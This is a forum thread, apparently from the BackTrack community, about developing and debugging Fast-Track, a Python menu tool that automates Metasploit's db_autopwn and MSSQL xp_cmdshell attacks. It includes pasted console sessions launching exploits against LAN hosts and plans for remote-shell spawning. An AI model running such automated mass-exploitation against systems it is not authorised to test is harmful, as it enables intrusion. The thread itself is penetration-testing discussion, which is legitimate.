Ok so I've been searching for this swiss army toll by this guy rel1k to no avail but I did find this (http://pastebin.ca/454351?srch=backtrack) so Im gonna play with this script later and see where it goes. If any one wants to look at it and tell me what they think That would be cool .I think THis is the script Im after thats in the video

ok not what i was after but im scripting it now and i will run some tests. my evil twin is always hacking me

ok this is in python which I'm not familier with .Some one please link me to a crash
course to learn If you know. I copied and saved the script In K-write .now what.

ok now i got it saved in kate because of sytax highlighting. I gave the file a py extension. then I chmod 755 "filename".py but I just get a new bash prompt. Some one save me. I knew i shoulda learned python instead of pearl

Maybe you need more than just that particular piece of code.

your right it doesnt look complete but Im working on it. It was wrote by the same guy that did that video Im after

"this rel1k guy" is in the irc, although I'm not sure if he just wants to give away his code as of yet because to my knowledge hes still working on it.




*edit* That looks like thats it, but Like i said hes doing plenty of work on it.

ok He emailed me back the script I found is different. I got it working but the script is incomplete so you have to edit it and fill in the paths for your preffered tools. Im currently building my own but Im getting married this weekend and going to hawai and on the advice of my friends im leaving all my computers at home. so after next week Ill post my revised script with full path some where. The down low on the securestates swiss army tool is that it is still in the testing phase he said it will be done in a month or so and i have offered to beta test it for him. so as soon as its availble and if its ok with him Ill share it or share the link or whatever I can get from him>If you pm me about the script and i dont answer its because I'm in hawai .WWWWHHHHeEEEEEEEEEEEEEEhttp://www.islandcars.net/car_rental_kauai_images/palm_tree.gif

I also found a cool plug in for kate that work well with python here (http://paul.giannaros.org/pate/)

ok He emailed me back the script I found is different. I got it working but the script is incomplete so you have to edit it and fill in the paths for your preffered tools. Im currently building my own but Im getting married this weekend and going to hawai and on the advice of my friends im leaving all my computers at home. so after next week Ill post my revised script with full path some where. The down low on the securestates swiss army tool is that it is still in the testing phase he said it will be done in a month or so and i have offered to beta test it for him. so as soon as its availble and if its ok with him Ill share it or share the link or whatever I can get from him>If you pm me about the script and i dont answer its because I'm in hawai .WWWWHHHHeEEEEEEEEEEEEEEhttp://www.islandcars.net/car_rental_kauai_images/palm_tree.gif

I also found a cool plug in for kate that work well with python here (http://paul.giannaros.org/pate/)

Have a safe and fun trip. Hopefully we won't see you until you get back! ;)

Thanx guys. I at least snuck a book on python in the luggage to read on the beach so I can complete the tool when i get home

You wern't talking about this were you purehate? I found this wile searching for packet construction stuff....

cryptcat
TCP/IP swiss army knife extended with twofish encryption

You wern't talking about this were you purehate? I found this wile searching for packet construction stuff....

cryptcat
TCP/IP swiss army knife extended with twofish encryption

Doubt it, i've seen the video he's referring to by rel1k. It just looks like an extremely handy script :P

It wont let me post a picture, something about 15 posts....

You can post the link just drop the http://www.com

http ://img266.imageshack.us/img266/8862/swissarmynp7.jpg

Heres a screenshot of what it looks like.
Just remove the space :)

Hey guys, I'm mostly on IRC in RE, you can always find me there. Little update on the tool is I'm working on it and should be ready by the release of BT3, I got a little tied up with work, multiple tripes to China, and taking my CISSP soon. I got the SQL portions finished, and am now working on the null sessions / auto brute functions. My goal is to make it so it can check back with remote-exploit and keep it up to date, so we can add tools, and make things easier. As well as making pentesting a little easier as well (menu driven). I'll keep you guys posted. As for Hawaii, I lived on Oahu for 4 years :) Lovely place!

Later!

ReL1K

Nice it look really nice.....this tools was a myth, a kind of legend lol....
i googled my ass for this "swiss army knife", for the attack.py too...lol

can't wait to test it out...................

thx to you to have given news.........:D

We will see :) Got a lot of work to do, I want to get at least the null sessions portion working, and all the update stuff. Also adding a sql injector that when you find a link, it tries to enable xp_cmdshell and spawn a remote shell. All plans coming soon!

nice ....really nice..your sql injector is really a good idea, allt things togather.....could be really efficient......:)

We will see :) Got a lot of work to do, I want to get at least the null sessions portion working, and all the update stuff. Also adding a sql injector that when you find a link, it tries to enable xp_cmdshell and spawn a remote shell. All plans coming soon!

I cant wait rel1k. Ive had a great time tweaking the attack suite .py script and I hope to test the swiss army knife:)

hi guys.
I saw this video and I think That it's pretty nice attack to wins system.
but before you release new BT3 this xp problme will be corected by windows programmer group.
and now if will be nice if you issue your attack.py because other time this troubleshoot about SQL injection using 1236 port will be eradicated.
waiting for your answer rel1K. :D.
or source code of attack.py I have emailed several time to milw0rm's str0ke but he didn't have.

You are confussed the attack.py script is NOT the tool seen in rel1ks video.

You are confussed the attack.py script is NOT the tool seen in rel1ks video.

look:http://milw0rm.com/video/watch.php?id=66 it's rel1Ks video.
and The tool was attack.py . what are you asking for me?

ok so I was wrong ,that is it so what is your issue? Just go download the script and use it now.What the problem?

Guys,

Had some more time to work on it, you can get a copy of it at

http://www.securestate.com/files/fasttrack/fast-trackv0.3.py

Theres a demo movie on how to use it at:

http://www.securestate.com/files/fasttrack/index.html

Take a peek... I haven't updated the video yet to add the Metasploit Autopwn Automation portion, I wrote that last night in like 3 hours, but if you go to menu two, you'll see it loads the database, the table, and then nmap scan's based on what you provided in the menu... it exploits, all you have to type is the sessions -l and sessions -i <id> number.

Take a peek at the help/creds, walks through it a little bit.

Take a peek and let me know what you guys think, I'm going to add a mysql portion that does the same thing as the mssql portion when I get some more time. If anyone else wants to help with this, let me know, I am often very busy in life :)

I totally missed this yesterday. rel1k I will try it out asap.:)

I got this error when type:

msf > db_autopwn -t -p -e
[-] Error while running command db_autopwn: no such file to load -- sqlite3

Hmmm,

Tested this out on Ubuntu using Sqlite3, let me see what DB Back|Track is using, thought it was sqlite3 as well. I'll update it as soon as I find out, need to get a VM of backtrack installed now I guess :)

I cannot remember what the default version is, but I seem to remember it is 3.3.7, I made a tutorial on updating it to 3.4.0 as Aircrack now needs 3.3.17 or higher and there is a problem upgrading it, I also made a module of 3.4.0 available here (http://rapidshare.com/files/41948177/sqlite-3.4.0.lzm) if that helps.

I plan later today to make a 3.5.1 module available, as Aircrack is already making that a min requirement under windows, so it won't be long before it affects Linux too.
In fact here (http://rapidshare.com/files/65309038/sqlite-3.5.1.lzm) is a link to 3.5.1 just in case.

Fixed, check out www.securestate.com/files/fasttrack/fast-trackv0.4.py

Check it out.

Also get same error............

msf > db_nmap 192.168.1.105

Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-27 00:34 GMT
Interesting ports on 192.168.1.105:
Not shown: 1695 closed ports
PORT STATE SERVICE
631/tcp open ipp
6000/tcp open X11

Nmap finished: 1 IP address (1 host up) scanned in 10.372 seconds
[-] Error while running command db_nmap: no such file to load -- sqlite3
msf > db_autopwn -t -p -e
[-] Error while running command db_autopwn: no such file to load -- sqlite3
msf >

Thanks for the feedback, alright, I tried making it easy to load multiple databases without expecting anything. I reuploaded the file and added a choice for you to pick your database, follow the instructions and you should be all set. It's not going to try sqlite3 unless you specify. Can download from link above, kept it on 0.4.

Keep me posted :)

Still not working...

bt ~ # ./fast-trackv0.4.py


Back|Track v3.0 http://www.remote-exploit.com

Fast|Track version 0.1 Beta

Please report bugs to the below address:

Written by: David Kennedy,
Handle:ReL1K
Company: SecureState
IRC: freenode and Astalavista

Be sure to check out the Help/Creds for more information and
shout-outs.

If you want to use the sql functions, make sure you install
FreeTDS and PYMSSQL from the Updates menu.

MAKE SURE YOU RUN THIS AS ROOT!!!

DISCLAIMER: This is only for testing purposes and can only be
used where strict consent has been given. Do not use this for
illegal purposes period.


Fast|Track Main Menu:

1. Fast|Track Updates
2. External Hackin
3. Internal Hackin
4. BackTrack Server Services (SSH, VNC, etc)
5. Help/Creds
6. Exit

Enter the number: 2

External Pentesting Menu:

1. Port Scanning
2. Exploitation (Metasploit)
3. Autopwn Metasploit Automated (requires pexpect from main menu)
4. Return to Previous Menu

Enter a number: 2
What do you want to launch, the MSF console or MSFWeb Interfaces?

Enter 1 for console 2 for web: 1
Launching MSFConsole

_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|


=[ msf v3.1-dev
+ -- --=[ 247 exploits - 116 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 43 aux

msf > load db_sqlite3
Successfully loaded plugin: db_sqlite3
msf > db_create pentest
Creating a new database instance...
CREATE TABLE hosts (
'id' INTEGER PRIMARY KEY NOT NULL,
'address' VARCHAR(16) UNIQUE,
'comm' VARCHAR(255),
'name' VARCHAR(255),
'state' VARCHAR(255),
'desc' VARCHAR(1024)
);
CREATE TABLE refs (
'id' INTEGER PRIMARY KEY NOT NULL,
'ref_id' INTEGER,
'name' VARCHAR(512)
);
CREATE TABLE services (
'id' INTEGER PRIMARY KEY NOT NULL,
'host_id' INTEGER,
'port' INTEGER NOT NULL,
'proto' VARCHAR(16) NOT NULL,
'state' VARCHAR(255),
'name' VARCHAR(255),
'desc' VARCHAR(1024)
);
CREATE TABLE vulns (
'id' INTEGER PRIMARY KEY NOT NULL,
'service_id' INTEGER,
'name' VARCHAR(1024),
'data' TEXT
);
CREATE TABLE vulns_refs (
'ref_id' INTEGER,
'vuln_id' INTEGER
);
msf > db_nmap 192.168.1.105

Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-27 14:00 GMT
Interesting ports on 192.168.1.105:
Not shown: 1695 closed ports
PORT STATE SERVICE
631/tcp open ipp
6000/tcp open X11

Nmap finished: 1 IP address (1 host up) scanned in 9.350 seconds
[-] Error while running command db_nmap: no such file to load -- sqlite3
msf > db_autopwn -t -p -e
[-] Error while running command db_autopwn: no such file to load -- sqlite3
msf > db_autopwn
Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-s Only obtain a single shell per target system (NON-FUNCTIONAL)
-r Use a reverse connect shell
-b Use a bind shell on a random port
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range

msf >

Did you re-download it? Works fine for me on BackTrack v2 now....not getting a db sqlite3 message.

Yes but still have same problem.......

Did you re-download it? Works fine for me on BackTrack v2 now....not getting a db sqlite3 message.

I receive a similar error video (http://tinyurl.com/32xqll).

Using ssh to a unaltered vmware image of BT2Final.iso

Interesting ports on 192.168.1.1:
Not shown: 1696 filtered ports
PORT STATE SERVICE
53/tcp closed domain
MAC Address: 00:14:6C:F6:36:78 (Netgear)

All 1697 scanned ports on 192.168.1.2 are filtered
MAC Address: 00:0C:F1:A8:61:DB (Intel)

All 1697 scanned ports on 192.168.1.3 are filtered
MAC Address: 00:10:C6:44:99:8E (USI)

Interesting ports on 192.168.1.5:
Not shown: 1694 closed ports
PORT STATE SERVICE
22/tcp open ssh
631/tcp open ipp
6000/tcp open X11

Nmap finished: 256 IP addresses (4 hosts up) scanned in 55.881 seconds
[-] Error while running command db_nmap: no such file to load -- sqlite3
msf >


I have a similar output

here is the solution .:cool:... maybe Rel1k can include this into his script (if i can help or build a gui .... just pm)

FIRST THING BEFORE STARTING FAST TRACK

start-db_autopwn
sudo -s postgres

fastrack-0.4.py

fasttrack update

update all stuff for sql & autopawn

EXTERNAL HACKING / AUTOPAWN.........

IPS

type postgres for database

and it roxxxxxxxxxxxxx

THX A LOT RELIK, BTW THREAD TITLE CHANGED........ THREAD MOVED TO APPROPRIATE CORNER............

sudo -s postgres



bt ~ #sudo -s postgres
/usr/local/pgsql/bin/postgres: /usr/local/pgsql/bin/postgres: cannot execute binary file
bt ~ #


Noticed you cannot exit from:

2. External Hackin -> 3. Autopwn Metasploit Automated -> (ip range) -> (database)
msf> exit
Enter ip ranges to autopwn:

yep sorry ;;;;

this works ......

i know rel1k says to run as root ... but ......
the 'root role' for psql don't exists..............

you need to run psql as postgres user

the pb is when you trying that...... pgsql is not here ... missing path .... so

under postgres account we add it

bt root $ su postgres
bt root $ PATH=$(echo $PATH':/usr/local/pgsql/bin')
bt root $ start-db_autopwn
[************************************************** ************]
Postgres should be setup now. To run db_autopwn, please:
# su - postgres
# cd /pentest/exploits/framework3
{*] # ./msfconsole
msf> load db_postgres
[************************************************** ************]
bt root $ sudo -u postgres postgres
bt root $ whoami
postgres
bt root $ cd Desktop
bt Desktop $ ./fast-trackv0.4.py


Back|Track v3.0 http://www.remote-exploit.com (http://www.remote-exploit.com/)

Fast|Track version 0.1 Beta

Please report bugs to the below address:

Written by: David Kennedy,
Handle:ReL1K
Company: SecureState
IRC: freenode and Astalavista

Be sure to check out the Help/Creds for more information and
shout-outs.

If you want to use the sql functions, make sure you install
FreeTDS and PYMSSQL from the Updates menu.

MAKE SURE YOU RUN THIS AS ROOT!!!

DISCLAIMER: This is only for testing purposes and can only be
used where strict consent has been given. Do not use this for
illegal purposes period.


Fast|Track Main Menu:

1. Fast|Track Updates
2. External Hackin
3. Internal Hackin
4. BackTrack Server Services (SSH, VNC, etc)
5. Help/Creds
6. Exit

Enter the number: 2

External Pentesting Menu:

1. Port Scanning
2. Exploitation (Metasploit)
3. Autopwn Metasploit Automated (requires pexpect from main menu)
4. Return to Previous Menu

Enter a number: 3

Metasploit Autopwn Automation

Simple, enter the IP ranges like you would in NMap i.e. 192.168.1.-254 or 192.16
8.1.1/24
or whatever you want and it'll run against those hosts. When it has completed ex
ploiting
simply type this:

sessions -l (lists the shells spawned)
sessions -i <id> (jumps you into the sessions)


Enter the ip ranges to autopwn: 192.168.1.1


What database are you using? BackTrack uses postgres, others prefer sqlite3. If
your
using BackTrack by default, just type postgres, if not type sqlite3

Choice postgres or sqlite3: postgres
Port scanning hosts...
Attacking hosts...be patient...
None
load db_postgres
db_create pentest
db_nmap 192.168.1.1
db_autopwn -p -t -e

o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....: :..::..:
::::::::::::::::::::::::::::::::::8::::::::::::::: ::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::


=[ msf v3.1-dev
+ -- --=[ 247 exploits - 116 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 43 aux

msf > load db_postgres
Successfully loaded plugin: db_postgres
msf > db_create pentest
CREATE DATABASE
ERROR: table "hosts" does not exist
NOTICE: CREATE TABLE will create implicit sequence "hosts_id_seq" for serial co
lumn "hosts.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for
table "hosts"
NOTICE: CREATE TABLE / UNIQUE will create implicit index "hosts_address_key" fo
r table "hosts"
ERROR: table "services" does not exist
NOTICE: CREATE TABLE will create implicit sequence "services_id_seq" for serial
column "services.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "services_pkey" f
or table "services"
ERROR: table "vulns" does not exist
NOTICE: CREATE TABLE will create implicit sequence "vulns_id_seq" for serial co
lumn "vulns.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "vulns_pkey" for
table "vulns"
ERROR: table "refs" does not exist
NOTICE: CREATE TABLE will create implicit sequence "refs_id_seq" for serial col
umn "refs.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "refs_pkey" for t
able "refs"
ERROR: table "vulns_refs" does not exist
Database creation complete (check for errors)
msf > db_nmap 192.168.1.1

Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-28 08:22 GMT
Interesting ports on 192.168.1.1:
Not shown: 1694 closed ports
PORT STATE SERVICE
21/tcp filtered ftp
23/tcp open telnet
80/tcp open http

Nmap finished: 1 IP address (1 host up) scanned in 12.767 seconds
msf > db_autopwn -p -t -e
Analysis completed in 30.0178060531616 seconds (0 vulns / 0 refs)
Matched exploit/windows/http/badblue_ext_overflow against 192.168.1.1:80...
Launching exploit/windows/http/badblue_ext_overflow (1/42) against 192.168.1.1:80...
Started bind handler
Matched exploit/windows/isapi/w3who_query against 192.168.1.1:80...
Trying target BadBlue 2.5 (Universal)...
Matched exploit/solaris/telnet/fuser against 192.168.1.1:23...
Launching exploit/solaris/telnet/fuser (3/42) against 192.168.1.1:23...
Started bind handler
.....
......

Will incorporate this into the script so you don't have to type this... Should be able to knock it out before Tuesday, I don't do things on the weekend :)

Finally, I solve the problem........thanks relix for a great tool......

bt ~ # ./fast-trackv0.4.py


Back|Track v3.0 http://www.remote-exploit.com

Fast|Track version 0.1 Beta

Please report bugs to the below address:

Written by: David Kennedy,
Handle:ReL1K
Company: SecureState
IRC: freenode and Astalavista

Be sure to check out the Help/Creds for more information and
shout-outs.

If you want to use the sql functions, make sure you install
FreeTDS and PYMSSQL from the Updates menu.

MAKE SURE YOU RUN THIS AS ROOT!!!

DISCLAIMER: This is only for testing purposes and can only be
used where strict consent has been given. Do not use this for
illegal purposes period.


Fast|Track Main Menu:

1. Fast|Track Updates
2. External Hackin
3. Internal Hackin
4. BackTrack Server Services (SSH, VNC, etc)
5. Help/Creds
6. Exit

Enter the number: 2

External Pentesting Menu:

1. Port Scanning
2. Exploitation (Metasploit)
3. Autopwn Metasploit Automated (requires pexpect from main menu)
4. Return to Previous Menu

Enter a number: 2
What do you want to launch, the MSF console or MSFWeb Interfaces?

Enter 1 for console 2 for web: 1
Launching MSFConsole

____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ msf v3.1-dev
+ -- --=[ 248 exploits - 116 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 43 aux

msf > load db_sqlite3
Successfully loaded plugin: db_sqlite3
msf > db_create pentest
Creating a new database instance...
CREATE TABLE hosts (
'id' INTEGER PRIMARY KEY NOT NULL,
'address' VARCHAR(16) UNIQUE,
'comm' VARCHAR(255),
'name' VARCHAR(255),
'state' VARCHAR(255),
'desc' VARCHAR(1024)
);
CREATE TABLE refs (
'id' INTEGER PRIMARY KEY NOT NULL,
'ref_id' INTEGER,
'name' VARCHAR(512)
);
CREATE TABLE services (
'id' INTEGER PRIMARY KEY NOT NULL,
'host_id' INTEGER,
'port' INTEGER NOT NULL,
'proto' VARCHAR(16) NOT NULL,
'state' VARCHAR(255),
'name' VARCHAR(255),
'desc' VARCHAR(1024)
);
CREATE TABLE vulns (
'id' INTEGER PRIMARY KEY NOT NULL,
'service_id' INTEGER,
'name' VARCHAR(1024),
'data' TEXT
);
CREATE TABLE vulns_refs (
'ref_id' INTEGER,
'vuln_id' INTEGER
);
msf > db_nmap 192.168.1.105

Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-29 19:38 GMT
Interesting ports on 192.168.1.105:
Not shown: 1695 closed ports
PORT STATE SERVICE
631/tcp open ipp
6000/tcp open X11

Nmap finished: 1 IP address (1 host up) scanned in 9.291 seconds
msf > db_autopwn -t -p -e
Analysis completed in 13.9838120937347 seconds (0 vulns / 0 refs)
msf >

Alright guys, reuploaded a newer version, I scrapped trying to fix the postgres stuff and just appended a howto if you want to use postgres. I added a menu in the Fast|Track updates page that installs the latest version of sqlite3 and the ruby addons to work within metasploit. Just by typing 9, it installs it, and just type sqlite3 in the autopwn automation menu and your good to go on BackTrack 2.

I removed all the Ubuntu stuff, since this is getting customized specifically for BackTrack.

www.securestate.com/files/fasttrack/fast-trackv0.5.py

Thanks for the work rel1k. we apreciate the adition to the bt aresonal.

will Test this asap ....

i had a look in the codes, and was surprised how simply coded is it....

python's cool really.... but unfortunatly it's not easy to build guis under python.....

what are you using for code python ? SPE (in BT) or another ?

will Test this asap ....

i had a look in the codes, and was surprised how simply coded is it....

python's cool really.... but unfortunatly it's not easy to build guis under python.....

what are you using for code python ? SPE (in BT) or another ?

Actually, I use kwrite, just a text editor, i use the Python IDLE in Windows for the GUI sometimes if I'm making stuff in Windows, but in Linux its easy enough to do it through kwrite. Appreciate the feedback, I'll continue to add on to it, v0.6 will have the update script working, figure a simple wget to the latest version to at least keep it updated. Should be easy to keep it updated that way. I could always svn it.

and btw: http://www.pygtk.org/ for GUI, very easy too.

Ok guys, you can download the latest version at:

http://www.securestate.com/files/fasttrack/fast-track.py

Made some changes, 1, the update menu is now functional. So when you go to fast-track updates, it has a menu 7 for update fast-track. It does a wget and pulls the latest version. Simply restart fast-track and your golden with the latest updates.

So I also added a check before you run the autopwn metasploit automation if you want to update Metasploit before you run it, if you type no, it obviously goes through and does the autopwn, if you do yes, it updates it.

Thats it for now :)

Hai relik..

Thanks relix for update fast-track tool...I can use postgres plugin and sqlite3 plugin in bt 2..

This is what i do for use postgres plugin and its work for me...

bt ~ # su postgres
bt root $ PATH=$(echo $PATH':/usr/local/pgsql/bin')
bt root $ start-db_autopwn
[************************************************** ************]
Postgres should be setup now. To run db_autopwn, please:
# su - postgres
# cd /pentest/exploits/framework3
{*] # ./msfconsole
msf> load db_postgres
[************************************************** ************]
bt root $ sudo -u postgres postgres
bt root $ ruby -e 'require "rubygems"; require_gem "postgres";'
bt root $ ./fast-track.py

and for use sqlite3 plugin just type...

bt ~ # ./fast-track.py

But I got others problem when use internal hackin.After install PYMMSQL and FreeTDS from the main menu the problem stills exist...

Fast|Track Main Menu:

1. Fast|Track Updates
2. External Hackin
3. Internal Hackin
4. BackTrack Server Services (SSH, VNC, etc)
5. Help/Creds
6. Exit

Enter the number: 3
What doya wanta do:


1. Scan for SQL, spawn xp_cmdshell
2. Port Scanning
3. Go Back a previous menu

Enter a number: 1


Did you install PYMMSQL and FreeTDS from the main menu? If not, go install it dude :P


Returning to main menu....


What doya wanta do:


1. Scan for SQL, spawn xp_cmdshell
2. Port Scanning
3. Go Back a previous menu

Is this from the latest one? I added a ldconfig at the end of it or else you required a reboot. Have you downloaded the latest version? Works fine on my BT2 box..curious

no pb for the moment with last version....
nice !

After im use the latest one,then install PYMMSQL and FreeTDS again now its work...

yep it rox ........
really thx ........

Glad to hear its working! Keep me posted if you notice anything....i was sniffing some packets with wireshark, the single wordlist brute forcer rules, im going to add about 30 more different passwords for testing SQL that I have found while doing pentests

just a trick you may add a uptodate sqlite version, i mean do a cvs checkout on VERSION file only and get the latest available reliz...

i mean something like this

os.system(echo "/1 :pserver:anonymous@sqlite.org:2401/sqlite Ay=0=a%0bZ" > /root/.cvspass && echo "/1 :pserver:anonymous@www.sqlite.org:2401/sqlite Ay=0=a%0bZ" >> /root/.cvspass )

os.system(cvs -d :pserver:anonymous@www.sqlite.org:/sqlite checkout sqlite/VERSION)

os.system(cat ./VERSION)
replace smilies by ":p"
the first os.system command create a 2 file line that contains passwd hash for next commands (mandatory)

result = 3.5.1 for the moment , you get this as a string and display it in your update module.......useful


i don't know if you are going to use this but it's a little nice thing to implemente, let your user know which version is available......

and just wonder to know why you NEED Pexpect

i mean why don't you simply put

load db_sqlite3
db_create pentest
db_nmap 192.168.1.11
db_hosts
db_autopwn -p -t -e
sessions -l

in a text file named /tmp/test you can create dynamically with the options (sqlite & ip)

and after you simply do

os.system(/pentest/exploits/framework3/msfconsole -r /tmp/test)

maybe more simple......

os.system spawns an instance of a shell, in order to jump into that shell you need to jump into the pid. I guess I could keep a store of the pid, and jump into it when it does the sessions -l but would be an extra 30 lines of code. It was extremely easy to put child.sendline, and child.interact(), not sure why I would complicate it with the text file and process jumping?

Ok firstly thank you for a great program :)

I've had a look at the python codeing and this is the first time I've ever seen it, as I've been doing a lot of C programming lately this doesn't seem as "hard" as I was expecting.

However, I'm stumped on presumably an easy bit.

When doing the FTP Bruteforce, I've created a 10 liner wordlist to test it on my FTP with the last being my password, however it only tests the first 7 letters when my password, like any good password is in excess of this. How do I increase the password length in the codeing??
Thanks guys :)

edit:
Ignore my bamblings. Got it fixed it wasn't a case of it not doing more than 7 digits it's I forgot to press enter to create a new line after the last word, therefore not taking into account the last letter.
I love this site, I've learnt so much over the last week now I'm on my Christmas Hols, all thanks to you guys :)

Hello relik,

Once again, great program.

After using Fast-Track 2.0 and Autopwn on my own network, the target being my friends laptop..failed [Which is good], as its secure. Although when me and my friend decided to do a remote attack against his IP address [obviously with consent, hes been my friend for over 10 years], db_nmap automatically ran the scan without '-PN' and the scan failed instantly due to his router blocking ping probes. I done it manually of course and his computer was secure, all is good for both me and my friend. :)

Question: Even though I done it manually and my goals where achieved, within the next release of Fast-Track could you add an option to scan with db_nmap with or without the avoidance of blocked ping probes?

No big deal, just a thought.

whooozaa this is great!!
works well:D

You should be able to do a -PN 192.168.1.1-254 or whatever when it prompts you to for the IP address ranges...that will work since im taking the entire string. I'll add more of an explanation of syntaxs in the menu on next update!

You should be able to do a -PN 192.168.1.1-254 or whatever when it prompts you to for the IP address ranges...that will work since im taking the entire string. I'll add more of an explanation of syntaxs in the menu on next update!

Ahh, happy days. Didn't know this was already implemented as there was no notice. Thanks again relik!

does back track have support for wifi? sorry, i'm a noob.

does back track have support for wifi? sorry, i'm a noob.
What does this question have to do with Fast-Track?

Have you even read the most basic documentation for BackTrack?!

does back track have support for wifi? sorry, i'm a noob.

i can't believe my eyes !!!!!!!

first , it would be polite to say hello ! or thx the crew for providing backtrack.

second RTFM ! it's obvious you haven't even take the time to read any docs on BT, or you would know that it's the number one distro for wifi pentesting !

i was not here for a long time, and i can see that when i come back, nothing have changed. seems to have the same rate of idiotic post & posters.....:mad:

does back track have support for wifi? sorry, i'm a noob.

Hello everybody!
I really enjoy backtrack. this is my first post. :P I have been reading a lot about this and I thank everybody that have made this dist possible, I also thank all the programmers that have made the programs. =)

Not to be mean but, Noob, noob. I often hear this as an excuse and it is OK for me! But if you use it for an excuse for such a question I don't really know if I will laugh or cry. Ok, I'm a noob too. But I take the time to read before posting any dumb questions! Read at the forum and you will discover that there are many posts about wifi there!

But anyway. I wish you good luck! ;)

Hello everybody!
I really enjoy backtrack. this is my first post. :P I have been reading a lot about this and I thank everybody that have made this dist possible, I also thank all the programmers that have made the programs. =)

Not to be mean but, Noob, noob. I often hear this as an excuse and it is OK for me! But if you use it for an excuse for such a question I don't really know if I will laugh or cry. Ok, I'm a noob too. But I take the time to read before posting any dumb questions! Read at the forum and you will discover that there are many posts about wifi there!

But anyway. I wish you good luck! ;)

Hironez welcome aboard! Nice to see that not everyone is a itard and can read. :D

It is however unfortunate that your first post had to be this one but, a nice one none the less.